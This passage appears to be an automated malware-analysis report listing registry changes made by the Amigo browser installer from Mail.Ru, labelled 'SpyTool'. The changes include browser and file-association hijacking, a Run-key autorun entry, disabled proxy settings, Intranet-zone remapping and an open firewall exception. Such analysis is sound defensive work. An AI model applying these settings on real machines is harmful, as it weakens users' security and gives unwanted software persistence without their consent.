[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\ContentDefender]
"SiteID" = "200075929"
"UserId" = "5D8B415E-D533-4EF4-AFB9-E19F1E9F7CCE"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process amigo.exe:1388 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Amigo\StabilityMetrics]
"user_experience_metrics.stability.exited_cleanly" = "1"

[HKCU\Software\Classes\https]
"URL Protocol" = ""

[HKCU\Software\Classes\.html]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Classes\https\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"BitNames" = " WLANHC_AUTOCONFIG WLANHC_RNWFMSM WLANHC_FATMSM WLANHC_DLLMAIN WLANHC_TEST"

[HKCU\Software\Amigo]
"metricsid" = "2CD7BD2B-6E06-447C-AB64-F1C71C866CFB"

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"BitNames" = " DOT11_AUTOCONF DOT11_AUTOCONF_CLIENT DOT11_AUTOCONF_UI DOT11_FATMSM DOT11_COMMON DOT11_WLANGPA DOT11_CLASS_COINSTALLER"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"Guid" = "2e8d9ec5-a712-48c4-8ce0-631eb0c1cd65"

[HKCU\Software\Amigo]
"metricsid_installdate" = "0"

[HKCU\Software\Classes\.shtml]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Classes\http\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"BitNames" = " DOT11_ASSOCIATE DOT11_ROAMING DOT11_1X DOT11_PNP DOT11_SCAN DOT11_RECEIVE DOT11_SEND DOT11_IOCTL DOT11_OID DOT11_MISC DOT11_UPCALL DOT11_KEYMGR DOT11_PEER DOT11_SOFTAP DOT11_PAM DOT11_REPEATER DOT11_APROUTER DOT11_WME DOT11_CONFIG DOT11_MSM DOT11_MSM_ADAPT DOT11_MSM_SCAN DOT11_MSM_CONNECT DOT11_MSM_SECURITY_PKT DOT11_NOTIFY_OBJECT"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Classes\http]
"URL Protocol" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"Guid" = "d905ac1c-65e7-4242-99ea-fe66a8355df8"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"BitNames" = " SECHC_LOG_FLAG_ASSERT SECHC_LOG_FLAG_INIT SECHC_LOG_FLAG_DIAG SECHC_LOG_FLAG_ONEX_DIAG SECHC_LOG_FLAG_REPAIR SECHC_LOG_FLAG_STATE SECHC_LOG_FLAG_EXT SECHC_LOG_FLAG_EVENT_LOG SECHC_LOG_FLAG_FUNCTION SECHC_LOG_FLAG_MEMORY SECHC_LOG_FLAG_LOCKS"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Classes\.xhtml]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"Active" = "1"

[HKCU\Software\Amigo]
"metricsid_enableddate" = "1451075806"

[HKCU\Software\Classes\.htm]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 32 B6 BB F1 23 B7 45 7C 2F A0 37 25 A4 DB F5"

[HKCU\Software\Amigo]
"usagestats" = "1"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"Guid" = "0c5a3172-2248-44fd-b9a6-8389cb1dc56a"

[HKCU\Software\Classes\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"BitNames" = " WD_LOG_FLAG_INIT WD_LOG_FLAG_RPC WD_LOG_FLAG_EVENT WD_LOG_FLAG_INTERFACE WD_LOG_FLAG_CONNECTION WD_LOG_FLAG_CONTROL WD_LOG_FLAG_LOCKS WD_LOG_FLAG_MEMORY WD_LOG_FLAG_REFERENCES WD_LOG_FLAG_FUNCTION_TRACE WD_LOG_FLAG_ASSERT"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"ControlFlags" = "1"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKCU\Software\Classes\.xht]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"Guid" = "6da4ddca-0901-4bae-9ad4-7e6030bab531"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"Guid" = "637a0f36-dff5-4b2f-83dd-b106c1c725e2"

The process setup.exe:1932 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Amigo]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"https" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCR\.shtml\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo,"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"tel" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Amigo\Commands\on-os-upgrade]
"CommandLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe --on-os-upgrade --verbose-logging"

[HKCR\.webp\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Amigo]
"FirstNotDefault" = "Type: REG_QWORD, Length: 8"

"ap" = "-stage:refreshing_policy"

[HKCU\Software\Amigo\Commands\on-os-upgrade]
"AutoRunOnOSUpgrade" = "1"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"AgentInstall" = "0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}]
"(Default)" = "CommandExecuteImpl Class"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".webp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Amigo]
"pv" = "44.4.2403.3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mailto" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Amigo]
"Name" = "Интернет"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"urn" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"VersionMajor" = "2403"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".htm" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCR\.html\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\amigo.exe]
"Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"PrevDefault" = "%Program Files%\Internet Explorer\iexplore.exe -nohome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"ftp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Amigo]
"UninstallArguments" = " --uninstall"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"sms" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ShowIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --show-icons"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"FirstInstall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"news" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "HTML Document"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"smsto" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".html" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationDescription" = "Amigo is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Amigo."

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ReinstallCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --make-default-browser"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayVersion" = "44.4.2403.3"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCR\.xht\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xht" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCR\.htm\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Интернет"

[HKCU\Software\Amigo]
"InstallerSuccessLaunchCmdLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".shtml" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"http" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe --uninstall"

[HKCU\Software\Amigo]
"InstallerError" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E C3 E1 26 95 AD A5 C4 B4 AB 57 9E 09 91 76 7D"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"InstallDate" = "20151225"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"nntp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}\LocalServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\delegate_execute.exe"
"ServerExecutable" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\delegate_execute.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Amigo]
"oopcrashes" = "1"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"amigoext" = "eeecheimdlkopnpajfcdmacgkjlkcmji;diciddlabejpoaofdnmoamebeohoiobg;egohihcbmlmdokfdoecjpdiadnkjgmdd;kgkggmpkealihpbjpdmcblcplljamohl;hlnkhcccfccipjdgeddoifmlognfajdp;mbipmajmbfjakbcfnjdldckninlnmhoe;hfpahoblpjopcfnlokmndooidiinhiie;nhhefclnfbjmnbbkhjplpnciolbbbdkd"
"stage" = "1"

[HKCR\.xhtml\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"webcal" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"Publisher" = "Mail.Ru"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"Guid" = "{BECAF35B-D220-4E88-BAC9-7B4DC8506D5B}"

[HKCU\Software\Amigo]
"InstallerExtraCode1" = "9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\amigo.exe]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"NoModify" = "1"

[HKCU\Software\Amigo]
"InstallerResult" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mms" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayName" = "Интернет"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xhtml" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"NoRepair" = "1"
"Version" = "44.4.2403.3"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"HideIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --hide-icons"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\Startmenu]
"StartMenuInternet" = "Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationName" = "Интернет"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"ua" = "CHANNEL_789104"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Amigo]
"lang" = "en"

[HKLM\SOFTWARE\RegisteredApplications]
"Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = "Software\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"VersionMinor" = "3"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"irc" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"IconsVisible" = "1"

To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"amigo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --no-startup-window"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application]
"amigo.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe:*:Enabled:Интернет"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Amigo]
"ap"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"first_bookmark_bar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"InstallResult"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Amigo]
"InstallerExtraCode1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"first_nosidebar"

The process verclsid.exe:1568 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 C4 D0 D0 2C 99 8D 26 53 82 DC 66 E4 A4 CD 0F"

The process mailruhomesearch.exe:1452 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
